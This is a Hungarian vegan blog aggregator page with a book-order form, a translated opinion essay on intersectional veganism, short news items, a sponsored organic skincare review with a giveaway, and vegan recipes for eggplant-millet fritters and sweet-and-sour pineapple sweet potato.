25%-os kedvezménnyel elérhető a zizikalandjai.com blogon! (Postázni csak magyarországi címre tudunk jelenleg!) Név* Vezetéknév Keresztnév Email cím* Email megadása Email megadása újból A véletlen elgépelés elkerülése céljából Számlacím* Számlán szereplő név / cégnév Utca, házszám (emelet, ajtó) Város Irányítószám Személyes átvétel esetén is szükséges megadni, mert a jog így kívánja meg! Eltérő a postacímed?* NemIgen Postacím (számlacímtől eltérő) Utca, házszám (emelet, ajtó) Város Irányítószám Telefonszám (Futárnak szüksége lehet rá) KönyvHány darabot küldhetek 25% kedvezménnyel?* 1234567891011121314151617181920 Dedikálhatom a könyvet?NemIgen Hány darabot dedikálhatok?1234567891011121314151617181920 Ha többet rendelnél, mint 1 db, így könnyen meg tudod adni, hogy ebből hányat lássak el néhány kedves sorral, és hányat ne. Ha ajándéknak szánod a könyvet és szeretnéd, hogy a megajándékozandó személy részére dedikáljam a könyvet, akkor kérlek a megrendelést visszaigazoló e-mailre válaszolj, és írd meg, hogy kinek írhatom az ajánlást! Köszönöm! Kérlek válaszd ki a fizetés / átvétel módját!* Utánvét, MPL futár (10.000 Ft-ot meghaladó értékű megrendelés esetén ingyenes!)Készpénz, személyes átvétel - INGYENES! (BOOOK Kiadó ügyfélszolgálatán, 1095 Budapest Mester utca 87.) Kérlek válaszd ki a fizetés / átvétel módját!* Utánvét, MPL futár - INGYENES (10.000 Ft értékű megrendelés fölött)Készpénz, személyes átvétel - INGYENES! (BOOOK Kiadó ügyfélszolgálatán, 1095 Budapest Mester utca 87.) Fizetendő 0,00 Ft Email Ez a mező az érvényesítéshez van és üresen kell hagyni. if(typeof gf_global == undefined) var gf_global = {gf_currency_config:{name:Magyar Forint,symbol_left:,symbol_right:Ft,symbol_padding: ,thousand_separator:.,decimal_separator:,,decimals:2},base_url:http://www.zizikalandjai.com/wp-content/plugins/gravityforms,number_formats:[],spinnerUrl:http://www.zizikalandjai.com/wp-content/plugins/gravityforms/images/spinner.gif};jQuery(document).bind(gform_post_render, function(event, formId, currentPage){if(formId == 4) {gf_global[number_formats][4] = {1:false,23:false,3:false,9:false,4:false,6:false,14:decimal_comma,19:false,10:false,11:false,22:decimal_dot,21:decimal_dot,17:false,24:false};if(window[jQuery]){if(!window[gf_form_conditional_logic])window[gf_form_conditional_logic] = new Array();window[gf_form_conditional_logic][4] = { logic: { 4: {field:{actionType:show,logicType:all,rules:[{fieldId:9,operator:is,value:Igen}]},nextButton:null,section:null},11: {field:{actionType:show,logicType:all,rules:[{fieldId:10,operator:is,value:Igen}]},nextButton:null,section:null},22: {field:{actionType:show,logicType:all,rules:[{fieldId:19,operator:,value:2}]},nextButton:null,section:null} }, dependents: { 4: [4],11: [11],22: [22],21: [21] }, animation: 0, defaults: {1:{1.2:,1.3:,1.4:,1.6:,1.8:},23:{23:,23.2:},3:{3.1:,3.2:,3.3:,3.4:,3.5:,3.6:},9:,4:{4.1:,4.2:,4.3:,4.4:,4.5:,4.6:},14:{14.1:,14.2:,14.3:},10:,11:1}, fields: {1:[],23:[],3:[],9:[4],4:[],6:[],14:[],19:[22,21],10:[11],11:[],22:[],21:[],17:[],24:[]} }; if(!window[gf_number_format])window[gf_number_format] = decimal_comma;jQuery(document).ready(function(){gf_apply_rules(4, [4,11,22,21], true);jQuery(#gform_wrapper_4).show();jQuery(document).trigger(gform_post_conditional_logic, [4, null, true]);} );} if(window[gformInitPriceFields]) jQuery(document).ready(function(){gformInitPriceFields();} );} } );jQuery(document).bind(gform_post_conditional_logic, function(event, formId, fields, isInit){} ); jQuery(document).ready(function(){jQuery(document).trigger(gform_post_render, [4, 1]) } );
Kirajzolódnak a határok – miért jó a megosztott állatjogi mozgalom?
Pár éve nő már a feszültség az állatjogi mozgalmon belül. Az interszekcionális szemlélet(1) egyre elterjedtebb, és egyre többen vizsgálják a fősodorbeli állatjogi mozgalmat kritikus szemmel. Az olyan vádakat, mint fehér vegánság (2), a vegán fogyasztói szemlélet, az embergyűlölő vegánságot sok helyről hallani. [tartalmi figyelmeztetés: nőgyülölő szitokszavak említése] írta: Veganarchy Egy hete egy híres vegán aktivista bejelentette, hogy vissza kíván vonulni az aktivizmustól, és ezért legfőképpen az interszekcionális szemlélet vegán közösségen belüli növekvő népszerűségét okolja. A Collectively Free Lilla Trenkovája volt olyan kedves, hogy összefoglalja a hoooosszú 2500 szavas esszét, hogy ne und magad halálra amíg elolvasod: most 2017-ben annyira elvékonyodott a fehér férfiúi törékenységem (3), hogy inkább felrobbanok, mintsem hogy bármit is tanuljak. Nyilván minden hatásnak van ellenhatása is, és ennek az aktivistának a visszavonulása nyomán fellángolt a vegán mozgalmon belüli szembenállás. Sokan határozottan kiállnak az ideológia álláspontjuk mellett, a Facebook tele van olyan hashtagekkel, mint a #FuckWhiteVeganism ( = bassza meg a fehér vegánság), vagy a #SJWCunts (kb = liberálfeminista pinák). És persze ott vannak azok, akik a pályán kívülről, tátott szájjal néznek, és hápognak, hogy mi történik a szeretett vegán mozgalmukban. Mind vegánok vagyunk, egységesen kéne kiállnunk! kiáltják. Bárcsak minden ennyire egyszerű lenne. Az egység valóban fontos, de kétféleképpen lehet elérni (bocsi, hogy nem megyek bele részetesen, hagyjál az egyetemi zsargonos sznobsággal, ez egy publicisztika): - Kamu (bullshit) egység: A fősodorbeli állatjogi mozgalom, ahol privilegizált fehér aktivisták dominálnak, és aminek botrányosan nincs semmi önkritikája, csak azt tanácsolja, hogy az emberek fogyasszanak vegán termékeket anélkül, hogy nagyobb összefüggésekben szemlélnék a kapitalizmust, a gyarmatosítást, és az elnyomás más formáit. Ez nemcsak, hogy figyelmen kívül hagyja az állatok elnyomásának a bonyolultságát, de a kritikus hangok elcsendesítése a mozgalomban elharapózik a rasszizmus, a szexizmus, a transzfóbia és egyéb elnyomó viselkedésformák, amik a hátrányosabb helyzetű csoportokat elidegenítik. Aki ilyen mozgalmat akar, az felszólítja az elnyomott embereket (és az ő szövetségeseiket), hogy üljenek le, kussoljanak, és szenvedjenek némán, ahelyett, hogy megtlálnék a saját helyüket, ahol erősnek érezhetik magukat. - Valódi egység: a valódi egységet úgy lehet elérni, ha figyelembe vesszük a más embercsoportok szükségleteit, és szolidaritást vállalunk az ő küzdelmükkel is. Ehhez az kell, hogy a privilegizált emberek (a társadalmilag domináns csoport tagjai) szerényebbek legyenek, hogy visszalépjenek és meghallgassák és tanuljanak másoktól. Ha egy queer személyt elcsöndesítenek amikor arról beszélne, hogy milyen kirekesztés érte a vegán mozgalmon belül, vagy egy színes bőrű ember kritikáját nem hallgatják meg, amikor arról beszél, hogy túlságosan gyarmatosító egy kampány üzenete, akkor nem hallgatjuk meg őket, és nem vesszük figyelembe a szükségleteiket, nem állunk mellettük a küzdelmükben. Az interszekcionális gondolkodás biztosítaná, hogy ezeket a hangokat lehessen hallani, és nemcsak ilyen kamu felejthető módon, hanem meghallgatni és aszerint cselekedni. Túl sokan vannak olyanok a vegán mozgalomban, akik nyíltan ellenzik az interszekcionális szemléletet, akik azt hadoválják, hogy az emberek elnyomásának nincs fontossága, hogy csak az állatok elnyomása számít. Ha tényleg egységes állatjogi mozgalmat akarunk, akkor van helyük ezeknek az embereknek benne? Ha igen, akkor a hátrányosabb helyzetű csoportok tagjai ugyan hogy fogják a magukénak érezni a vegán ügyet? Világos, hogy ha valójában egységes vegán mozgalmat akarunk, akkor a létre kell hoznunk a saját helyünket benne. A fősodorbeli vegán közösséget hiába is akarjuk megreformálni, mert ezek a helyek már merev konzervatív ideológiák mentén szerveződnek. Miért pocsékolnánk erre az energiánkat? Hagyjuk, hogy az ismeretlenségbe süllyedjenek, és néha nevessünk a cisz fehér férfiak felfújt egójának a csapkodásán. Ez egy felhívás. Most van itt az ideje, hogy létrehozzunk egy alternatívát. Vegyünk példát a Collectively Free-ről: jól bemutattak a fősodorbeli vegán közösségnek, és a saját útjukat járják az interszekcionális szemlélet, a befogadás és a társadalmi igazságosság mentén. Alapítsátok meg a saját csoportjaitokat, közösségeiteket és szervezeteiteket. Szerveződjünk és alakítsuk át az állatjogi mozgalmat. Oszd meg és uralkodj. Most már tudod, hogy a megosztottság jót tesz a társadalmi mozgalmaknak. Végülis... te dolgoznál együtt az állatjólétisekkel? ;-) Forrás: https://medium.com/@Veganarchy/the-lines-are-being-drawn-the-case-for-a-divided-animal-movement-4acd3ed8b2fd fordította: tudatosvegán A fordító jegyzetei: (1) interszekcionális szemlélet: az interszekcionalitás szót Kimberlé Crenshaw professzor kezdte használni azokra a helyzetekre, amikor az afrikai nők elnyomását bonyolította mind az afrikai mivoltuk, mind a női mivoltuk, tehát az élményeik különböztek mind a fehér nők tapasztalataitól, mind az afrikai férfiak tapasztalataitól. A pro-interszekcionális vegánság az állatok elnyomásán túl figyelembe veszi és aktívan küzd az emberek elnyomása ellen is (pl bőrszín/etnikum, nem, szexuális irányultság, életkor, fogyatékosság stb alapján történő diszkrimináció), felismerve, hogy az állatok és az emberek elnyomásának is ugyanaz az okozója. 2) fehér vegánság: rasszizmus a vegán mozgalmon belül, pl: az állatok elnyomását az afrikai rabszolgákhoz vagy a Holokauszthoz hasonlítani, majd felháborodni, ha valaki kritizálja ezt. Bővebben lásd (2) (3) fehér/férfiúi törékenység: a ford. jegyzete: sajnos nem találtam semmit arra, hogy a white(/male) fragility-t hogyan lehet magyarra fordítani, úgyhogy nekifutottam. Összefoglalva: a törékenység a társadalmi hierarchia domináns csoportjának a defenzív (negatív) reakciója, amikor szembesítik a saját elnyomó szerepével. Pl: egy férfi dühös lesz ha nőgyűlölettel vádolják, vagy egy fehér ember dühös lesz, ha rasszizmussal vádolják. A fehér törékenység pontos definíciója: a legkevesebb etnikai feszültség is elviselhetetlen, ezért defenzív reakciót okoz. Az [észak-amerikai] fehér emberek nagy része olyan társadalmi közegben él, ahol nem éri őket megkülönböztetés a bőrszínük alapján. Mivel a kulturális többség részei, ezért ritkán állnak szemben etnikai feszültséggel, de amikor igen, akkor ellenségesek, bűntudatosak, defenzívek vagy ijedtek lesznek. Robin diAngelo, http://libjournal.uncg.edu/ijcp/article/viewFile/249/116, idézi: http://www.salon.com/2016/07/18/white_fragility_is_real_4_questions_white_people_should_ask_themselves_during_discussions_about_race/ The post Kirajzolódnak a határok – miért jó a megosztott állatjogi mozgalom? appeared first on VegaNinja.
Vegetáriánusbűnözés: szójadarával csalt áfát egy dunántúli bűnszervezet
A fiktív számlákat kibocsátó magyarországi cégek élére stróman ügyvezetőket hajtottak fel.
Magyaros vegán bableves
És még mondják, hogy a magyaros ízekhez nem passzol a vegánság! :) Meg, hogy a hagyományos ételeket el lehet felejteni, ha az állati eredetű hozzávalókról lemondunk. Ugyan már! :) Ez az a levesem, amit egyszer a messzi földről ide látogató kedves vegán barátaimnak megfőztem, amikor vendégül láttam őket az otthonomban. Hála az utóbbi években nyílt, sok egészséges budapesti étteremnek, igazán volt mit enniük napi szinten, de a magyaros ételek így is kimaradtak. Pedig nem jártál egy országban, ha nem kóstoltad a konyháját. Viszont egy vegán számára ez itt majdhogynem lehetetlen, mivel a magyaros ételek többsége elég messze van a növényi táplálkozástól. Kár lett volna érte, mert lenyűgözte őket a gazdag paprika íz és a gyönyörű színek ebben a gazdag, tartalmas levesben. Bevallom, büszke voltam magamra, pedig az érdem nem az enyém, hanem a magyar konyháé.
Vegán életmód – Perla Organic Skincare + Nyereményjáték
2017. március 2. Zizi kalandjai
A nyereményjáték lezárult! A nyertes: Bárdi Júlia emailben lett értesítve. Köszönöm, hogy játszottatok! Távol állok a beauty blogolástól, nem vagyok a téma szakértője, de többen kérdeztétek már, hogy milyen natúrkozmetikai termékeket használok, ezért indítok egy sorozatot itt a blogon (vegán szépségápolás), amelyben vegán kozmetikai, szépségápolási termékeket mutatok be, amelyeket kipróbáltam, használok és nagyon jónak tartok. Arra, hogy mit kenek az arcomra (nyaktól felfelé) már lassan tíz éve odafigyelek, de nyilván az idősödés újabb vékonyka ráncokkal jár és rájöttem, hogy ha csak egy kicsivel több időt fordítok magamra, már sokat tettem magamért, azért, hogy lestrappált anyaként kicsit jobban érezzem magam és igen, lassítsam az öregedés folyamatát is, csak egy icike-picikét. Általában fiatalabbnak néznek a koromnál, ez jól esik az egómnak – lehet, hogy hála annak a krémnek, amit már jó néhány éve használok? Nem tudom… talán igen, de azt nagyon fontosnak tartom, hogy időben elkezdjük a korunknak megfelelő bőrápolást. Amióta anya vagyok azóta tényleg nagyon kevés időt szánok magamra. Amíg régen kétszer mostam hajat egy héten, most csak egyszer (mondjuk egyik várandósságom alatt sem zsírosodott a hajam, ekkor szoktam rá a heti egyszeri hajmosásra). Hajpakolás évente egyszer kerül a hajamra, arcpakolást nagyon ritkán lát az arcom, noha mindegyikből többet szeretnék. Meg néha jól jönne egy kis wellnesezés, amikor befekszem a kádba, bedobok egy fürdőgolyót, lazítok és kikapcsolok végre a hektikus hétköznapokból. A Perla organikus arcápoló olajat nemrég ismertem meg. Kizárólag hidegen sajtolt, finomítatlan, bio minősítésű olajokat és megtisztelő Demeter minősítésű illóolajokat tartalmaz – jojoba, ligetszépe, szőlőmag, ricinus, tamanu, római kamilla, pálmarózsa, vanília, édesnarancs, vetiver, teafa, linaloefa. Olyannyira a napom részévé vált, hogy napközben többször eszembe jut az újonnan beiktatott kis rutinom és elkezdem várni az estét, hogy csak öt percre is, de egy wellness kényeztetésen érezzem magam. A Perlaval lehet sminket is eltávolítani, én viszont ápolásra használom, mert a munka, a háztartás és a gyerekek mellett alig jut időm magamra, de felismertem, hogy vágyom a puha, hidratált bőrre. A Perlaval beolajozom az arcom, jól átmasszírozom, majd egy meleg vízzel átitatott kis törölközőt az arcomra teszek és várom, hogy egy-két perc alatt a törölköző kihűljön, jól átdörzsölöm vele az arcomat és már készen is vagyok. A nap végén ezt a “luxust” megengedni magamnak, a legjobb dolog. Másnap tényleg tisztább a bőröm, kipihentebbnek tűnök és olyan jól érzem magam tőle. A Perla csodaszép dobozban érkezik… A Perla megálmodójával és létrehozójával, Geosics Reginával beszélgettem az alkotásról, a termékről… Hogyan jött az ötlet és mikor, hogy létrehozz egy ilyen terméket? Mi volt a cél, milyen terméket szerettél volna és miért? Mindig is problémás bőrrel rendelkeztem, ami körülbelül fél évvel ezelőtt tetófokára hágott… nem csak esztétikailag volt zavaró, de már fájt is a gyulladástól. Szeretem holisztikusan megközelíteni a dolgokat, de akkor úgy éreztem, hogy a táplálkozásommal, életmódommal kapcsolatosan minden tőlem telhetőt elkövetek és “kívül” kell a megoldást keresnem… Emellett kisfiam születése óta folyamatosan keresem azokat a megoldásokat amik leegyszerűsítik az életemet. Ekkor jött szembe egy módszer, az OCM (oil cleaning method) ami itthon még nem túl elterjedt, de külföldön már egyre népszerűbb. Azonnal éreztem, hogy ezt nekem is ki kell próbálnom, de itthon nem találtam hozzá megfelelő minőségű és összetételű olajkeveréket, külföldről pedig túlságosan költséges lett volna rendelni. Így óriási kutatásba kezdtem, annyira belelkesedtem, hogy éjjel-nappal csak ezzel foglalkoztam – nyilván amennyire lehet egy totyogó mellett. Megalkottam a számomra tökéletes kompozíciót és nagyon rövid időn belül látványos eredményt értem el. Környezetemben is felfigyeltek rá és kérték, hogy nekik is keverjek ki Perlát (aminek akkor még nem volt neve). Ekkor bevillant, hogy ha ennyire hatásos és ennyire nem ismerik még Magyarországon, miért ne lehetne mások számára is elérhető. Szeretném terjeszteni magát a módszert és a Perlát is, hogy minél több nőhöz eljusson. Annyira fontos, hogy mi az amit magunkra kenünk és – habár egyre több tudatos nővel találkozom – az emberek nagy részének fogalma sincs arról, mit ken magára. Milyen szakemberekkel (vagy kikkel) dolgoztál együtt a termék létrehozása során? A receptet végül egy fantasztikus aromaterapeuta segítségével tökéletesítettük, akitől sokat tanultam és még inkább felnyitotta a szemem, hogy illóolajból csakis a legeslegjobbat érdemes használni. Óriási erő egy kis cseppben, nem is gondolnánk milyen hatással van ránk – nem csupán érzékeinkre, de hangulatunkra, lelkünkre, testünkre. Azóta az illóolajok szerelmese vagyok. A folyamatban részt vett még egy vegyész és a manufaktúra tulajdonosa, ahol minden egyes Perla készül. Milyen magyar vagy nemzetközi minősítésekkel rendelkezik a termék (Vegan, Cruelty Free, Cosmos Naturel, Biokontroll Hungária Kft, stb.)? A Perla vegán termék és természetesen állatkísérletektől mentes valamint az összes összetevő bio gazdálkodásból származik, sőt az illóolajok a megtisztelő Demeter minőséggel rendelkeznek. A kész terméket még nem szertifikáltattuk, de tervben van. Hosszú és költséges a folyamat, amit kezdő családi vállakozásként egyelőre még nem tudunk vállalni. Tudom, hogy a hivatalos minősítés fontos, de ami még fontosabb, hogy minden este olyan tiszta lelkiismerettel fekszem le, mint amilyen tiszta a Perla is! Tervezel el termékbővítést? Ha igen, mi lesz a következő terméked? Először azt gondoltam, hogy egy tökéletes termék legyen, ami használható tisztításra, sminkeltávolításra, arc- és testápolásra… azóta persze beindult a fantáziám. Nem tervezek széles termékpalettát, de egy-két egyedi ötletem, álmom van, amit még szeretnék megvalósítani. Azt még nem tudom, melyik lesz a következő! Regina blogja, a Feminie A Perla elérhető az alábbi linkeken: – weboldal – Facebook – Instagram A termékeket a {Perla Skincare} biztosította a teszteléshez. A véleményem csakis a sajátom. ***** NYEREMÉNYJÁTÉK!!! Nyeremény : Egy üveg (50 ml) Perla többfunkciós organikus olaj. Írjátok meg ide a bejegyzés alá kommentben, hogy ti milyen natúrkozmetikai, szépségápolási terméket (márkát) használtok, amely nagyon bevált számotokra. Szabályok : Kérem, hogy az alábbi formula minden pontját töltsétek ki (bejelentkezés email címmel a formulába): kommentelés (ide a bejegyzés alá) és plusz pontokért lájkoljátok a Perla Facebook, illetve Instagram oldalát. 2017. március 6-ig lehet játszani. Sorsolás a Rafflecopter szoftverrel. Eredményhirdetés 2017. március 7-én. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyereményt a nyertesnek a Perla Skincare postázza magyarországi címre. a Rafflecopter giveaway
PaKölNi, azaz a PAdlizsán-KÖles tócsNI és egy kis utazós szösszenet (gluténmentes, laktózmentes, tojásmentes, vegán)
2017. február 28. Zöld Avocado
PaKölNi, azaz a padlizsán-köles tócsni (gluténmentes, vegán) Hamarosan ismét útra kelünk. Ilyenkor mindig igyekszem olyan recepteket kitalálni, melyekkel fel tudom használni a kamrában és a polcokon várakozó alapanyagokat. Mivel mottóm, hogy "ételt a szemétbe ki nem dobunk", igyekszem elpusztítani mindent, hogy ne maradjon utánunk semmi. Ennek a polckiürítő akciónak köszönhetőn jött a feladvány... Mit kezdjek a bontatlan kölessel, van egy csomó lenmagom, útifűmaghéjam és két db padlizsán is már a végét járja a hűtőben. A múltkori nagy sikerű csicseriborsó-sárgarépa-cukkini FALNI inspirálta a most elkészült kistestvérét, PaKölNi-t. PaKölNi, azaz a padlizsán - köles tócsni, mely a pakolós időszakra még szóviccnek is elmegy. Gyerünk, gyerünk pakolni, segít benne PaKölNi! :-D Aki ismer, az tudja, hogy szeretem a változást. Szeretjük megélni az életet és felfedezni minél több országot, kultúrát, gasztronómiát, tájat stb. Ezt az évtizedet az utazásoknak, a különböző országok "otthonként" való megélésüknek szenteljük. Miközben látunk, tapasztalunk, tanulunk és rengeteget fejlődünk... Mindenkinek kötelezővé tennék min. egy fél év utazást más országokba. Sokkal jobb, mint bármilyen iskola! Hollandiában a legtöbb érettségizett fiatal útra kel 1 évre, utazgat, dolgozgat, önkénteskedik, megismeri a Világot és önmagát a Világban. Így sokkal könnyebben tér vissza a szólő országába és választ továbbtanulási lehetőséget vagy munkahelyet. Gondoljunk csak bele mennyire nem ismerjük magunkat és a lehetőségeinket még 18 évesen... mégis választanunk kell "Mi leszel ha nagy leszel" életet. És mennyi téves útra lépünk rá, vagy éljük le az életünket boldogtalanul a számunkra nem megfelelő szakmában... Szomorú. Most már tudom, hogy az utazás annyi mindenre gyógyír és válasz. Kinyílik a Világ minden értelemben. Amikről azt hittem korábban, hogy problémák és milyen rossz nekem, most már tudom, hogy semmiség. Találkoztam számtalan emberrel a Világ másik végéről, akik megmutatták, hogy milyen szerencsés vagyok, amiért EU-s útlevelem van. Egyik nap még a tehenek földjén élek és dolgozom, másik nap már a Kanári szigetek egyik üzletében vagyok eladó. Könnyedén megtehetem, mert EU van. Miközben több ezer vagy talán millió ember szeretne változtatni az életén, a környezetén, amibe beleszületett, de nem tud, mert nem lehet. Mivel vagyok én jobb vagy több, mint az a brazil barátom, aki a nyomornegyedből felküzdötte magát az egyetemig, szuper okos és nagyon jó IT-s szakember? De mivel vízumköteles országból jött, hiába szeretne egy menő európai cégnél dolgozni, ahol kapkodnának a szakértelme és a tudása után, nem kap munkavállalási vízumot. Több ezer eurót fizet minden félévben a diákvízumért, hogy időt nyerjen magának miközben keresi a céget, aki "örökbe fogadná", mint munkavállaló. Közben pedig takarít vagy más betanított munkát végez, hogy meglegyen a napi betevő. Ilyenkor mindig rájövök, hogy én milyen szerencsés vagyok. Hiszen nekem EU-s útlevelem van. PaKölNi, azaz a padlizsán-köles tócsni (gluténmentes, vegán) Egy másik számomra nagyon tanulságos és értékes barátság egy örökké mosolygó fülöp-szigeteki lánnyal volt/van. Cathy mesélte nekem, hogy a hazájában átlagosan 8-10 gyermek van egy családban. Sok szép tini lányt adnak el a szülők emberkereskedőknek, hogy a többi testvérüket tudják etetni és iskoláztatni. 1 áldozat a másik 8-ért cserébe. A szerencsésebbeket külföldre adják férjhez, ahol a "gazdag" európai feleség életét élhetik. Ez számukra az álom élet. Kislányként amikor a szőke hercegről álmodoznak, akkor egy fehér bőrű, európai herceg képe kering előttük, aki repülővel érkezik és egészen Európáig repíti őket a szülői háztól. Az én barátnőm is ilyen életet álmodott és kapott is magának holland feleségként. Otthon holland történelmet, alap ismereteket tanítanak ezeknek a lányoknak, holland-filippínó internetes társkereső oldalakon regisztrálnak, majd amikor megvan a nagy "Ő", akkor holland vizsgát kell tenniük, ahol a holland ABC ismeretéről is tanúbizonyságot kell tenniük. Azok, akik megbuknak a vizsgán, nem mehetnek el. És mindez legálisan. Persze vannak LOVE sztorik is. Cathy barátnőm is szerencsés, hiszen a kiválasztottal végül a szerelem is kialakult, így habár az áhított európai élet csalódást okozott neki (túl sok szabály és kevés öröm), azért a társát megtalálta. Ilyen és ehhez hasonló barátságok után hatalmas hálát érzek érte, hogy szabadon választhattam meg a férjem és szerelemből házasodhattam. Ez is egy hatalmas kiváltság még mindig a mai Világban. Annyi minden van, amiért hálásak lehetünk, mert magyarnak születtünk. Ezek nagy részét csak akkor érthetjük meg, élhetjük át, ha egy kis időre elhatjuk a hazánkat és megismerjük a Világot. Mi is ismét útra kelünk és az idei év szorgos napjait Franciaországban fogjuk tölteni. Izgatottan és kíváncsian várom az új kalandokat, az új élményeket, a fejlődési lehetőségeket. Nektek is azt tudom ajánlani, hogy ha tehetitek, hagyjátok el időnként a komfortzónátokat, mert mindig megéri, bármilyen ijesztőnek is tűnik előtte az új kaland. ;-) És akkor vissza a recepthez... A recepthez, mely egyszerű, csak pár hozzávalóra lesz szükségünk, és szerintem a hagymás dödölle ízvilágához hasonlít a leginkább. Ha nem tudom, hogy köles van benne, akkor krumplira tippeltem volna. PaKölNi, azaz a padlizsán-köles tócsni (gluténmentes, vegán) HOZZÁVALÓK (kb. 2-3 személyre) - 2 db padlizsán - 1 bögre köles + 2 bögre tiszta víz - (Himalája) só, frissen őrölt fekete bors, 1 ek o regánó - 1 db kisebb vöröshagyma - 1 ek kókuszzsír - 1 ek útifűmaghéj - (2 ek lenmag - elhagyható) PaKölNi, azaz a padlizsán-köles tócsni (gluténmentes, vegán) ELKÉSZÍTÉS 1) A padlizsánt hámozzuk meg, vágjuk fel kockákra és párolóedényben pároljuk puhára kb. 20 perc alatt. 2) A kölest a dupla adag vízben főzzük szét fedő alatt, ragacsosra, kb. 15 perc alatt. 3) A kihűlt és puhára párolt padlizsánt a vöröshagymával együtt turmixoljuk péppé. (Ehhez használhatunk zöldségaprítót vagy kézi botmixert. De villával is szét tudjuk nyomkodni a padlizsánt, amihez aztán hozzáreszelhetjük a vöröshagymát.) 4) A padlizsán + vöröshagyma pépet a kihűlt ragacsos kölessel és az összes egyéb hozzávalóval egy tálban kézzel összenyomkodjuk. Azért kézzel, mert úgy sokkal puhább lesz. A végén egy nagy hagymától illatozó masszát kell kapnunk. 5) Hagyjuk a masszát kb. 15 percet pihenni. 6) Vegyük elő a teflon palacsinta sütőnket és kevés kókuszzsíron süssünk a masszából tócsni szerű, tenyérnyi méretű plecsniket. Mindkét oldalt süssük aranybarnára. A puha tészta könnyen törik, ezért műanyag lapáttal fordítsuk meg őket, hirtelen mozdulatokkal. 7) Tálalhatjuk a kész PaKölNi tócsnikat diétánkhoz hű vegán natúr joghurttal, laktózmentes tejföllel, de akár avokádókrémmel is el tudom képzelni. Jó étvágyat kívánunk a rendhagyó és mégis egyszerűen elkészíthető ételhez! PaKölNi, azaz a padlizsán-köles tócsni (gluténmentes, vegán) Táplálkozz, ne csak étkezz! Tetszett a recept? Lapozz bele a Mit eszik a Világ? című könyvembe, melyben 284 színes oldalon ... ...és 170 db egészséges recepten keresztül ehetjük körbe a Világot! Megnézhetjük együtt milyen alapanyagokat fogyasztanak már több ezer éve a távoli országokban,... ...hogyan őrzik meg egészségüket és maradnak fiatalok az emberek, ...miként készíthetjük el a természet kincseit az európai otthonunkban is könnyedén és ízletesen! Számtalan recept, sok-sok hasznos konyhai tipp és rengeteg természetes alapanyag, diétánkhoz igazítva! "Kedves Mit eszik a világ? rajongók! Büszkén jelentem, hogy már én is közétek tartozom! Eddig is tudtam, hogy az leszek, de a tegnapi napon tulajdonosa lettem a várva várt dedikált példánynak! ? Abban a szerencsében részesültem, hogy részt vehettem a hollandiai könyvbemutatón és megkóstolhattam néhányat ezekből a csodás receptekből! Aki kihagyta sajnálhatja, akinek pedig lehetősége lesz egy könyvbemutatón résztvenni, Ne hagyja ki!!! Nagyon megéri! Az ételek nem csak, hogy egészségesek, könnyen elkészíthetők, de finomak és ízletesek is!!! (Én még húsevő, jól megtermett férfiakat nem láttam így enni... Nem mozdultak el az asztal mellől és megnyalták mind a 10 ujjukat ?) Köszönöm Szonja, hogy vagy, hogy megteremtetted ezt a csodát, hogy útmutatást adsz egy általam választott új kihívásban és életmódváltásban, és hogy a barátomnak mondhatlak!!! ? ?" /Barbi/ Kattints ide és nézz bele a könyvbe!
Megugrottak a zöldségárak
A magyar piacot ősztől tavaszig friss zöldséggel ellátó spanyol, olasz termelők a termésük felét is elveszíthették a Dél-Európában szokatlan zord időjárás miatt, ennek eredményeként megkétszereződött, egyes esetekben megháromszorozódott az importtermékek ára - írta a Népszava szombati számában.
Édes-savanyú ananászos batáta rizzsel (gluténmentes, laktózmentes, tojásmentes, vegán)
édes-savanyú ananászos batáta rizzsel (mindenmentes, vegán) Az úgy kezdődött, hogy AKCIÓS volt az ananász és az édesburgonya is a boltban... aztán úgy folytatódott, hogy mostanában a régi, kedvenc húsos ételeimet reformálom meg és varázsolom őket húsmentessé, a leginkább természethez (és nem pedig az élelmiszeriparhoz) közeli állapotba. Így hát végül úgy végződött, hogy a múltkori mexikói-magyar barátság után, most Délkelet-Ázsia konyháiba kalauzollak el titeket egy kis thaiföldi napsütésért. ;-) Az édes ízek kedvelőit most nagyon boldoggá fogom tenni! :-) Csak annyit fűznék hozzá: sokkal finomabb lett, mint azt elképzeltem! :-o édes-savanyú ananászos batáta rizzsel (mindenmentes, vegán) HOZZÁVALÓK (Kb. 4 személyre) kb. 800 g batáta (vagy édesburgonya) kb. 800 g friss ananász 4 ek kókuszzsír vagy olívaolaj (Himalája) só, csipet őrölt fehér bors 2 ek világos szójaszósz, 2 ek balzsamecet (étkezési ecet is jó) 3 gerezd fokhagyma 1 közepes fej vöröshagyma 1/2 db zöld színű és 1/2 db piros színű kaliforniai paprika 1 tk frissen reszelt gyömbér 4 ek ketchup (paradicsompüré is jó) 3 ek édesítőszer tetszés szerint (én kókuszcukrot használtam) 1/2 db frissen facsart citrom leve 2 bögre barna rizs (3 ek fehér szezámmag - elhagyható) édes-savanyú ananászos batáta rizzsel (mindenmentes, vegán) ELKÉSZÍTÉS 1) A rizst feltesszük a szokásos módon főzni. (Dupla adag vízben, kb. 25 percig.) 2) Előkészítés: A vöröshagymát és a paprikákat hosszúkás csíkokra vágjuk. A batátát (édesburgonyát) és a friss ananászt meghámozzuk és kb. kockacukor méretű formákra vágjuk. 3) Felteszünk egy WOK-ot a tűzhelyre. Beletesszük a kókuszzsírt, a vöröshagymát, a felkockázott batátákat, a csíkokra vágott paprikát egy 1/2 bögre tiszta vízzel főzni. Reszeljük hozzá a fokhagymákat és a gyömbért. Fedjük le fedővel és kb. 15 perc alatt főzzük félpuhára a batátát. 4) Ezután hozzáadjuk az ananászt és fedő nélkül még kb. 10 percig főzzük. 5) Közben keverjük ki az édes-savanyú szószt: ketchup + szójaszósz + balzsamecet + édesítőszer + 4 ek tiszta víz. Forraljuk fel az egészet, majd vegyük le a tűzről és adjuk hozzá a frissen facsart citromlét, majd az egészet keverjük az ananászos batátához. (Tetszés szerint megszórhatjuk szezámmaggal is.) 6) Egy utolsó összeforralás (kb. 2 perc) és már kész is. 7) Barna rizzsel, rizstésztával vagy üvegtésztával azonnal tálalható. (Én szervíroztam mellé friss és ropogós jégsalátát is.) édes-savanyú ananászos batáta rizzsel (mindenmentes, vegán) Táplálkozz, ne csak étkezz! édes-savanyú ananászos batáta rizzsel (mindenmentes, vegán)Jó étvágyat kívánunk! :-) Tetszett a recept? Lapozz bele a Mit eszik a Világ? című könyvembe, melyben 284 színes oldalon ... ...és 170 db egészséges recepten keresztül ehetjük körbe a Világot! Megnézhetjük együtt milyen alapanyagokat fogyasztanak már több ezer éve a távoli országokban,... 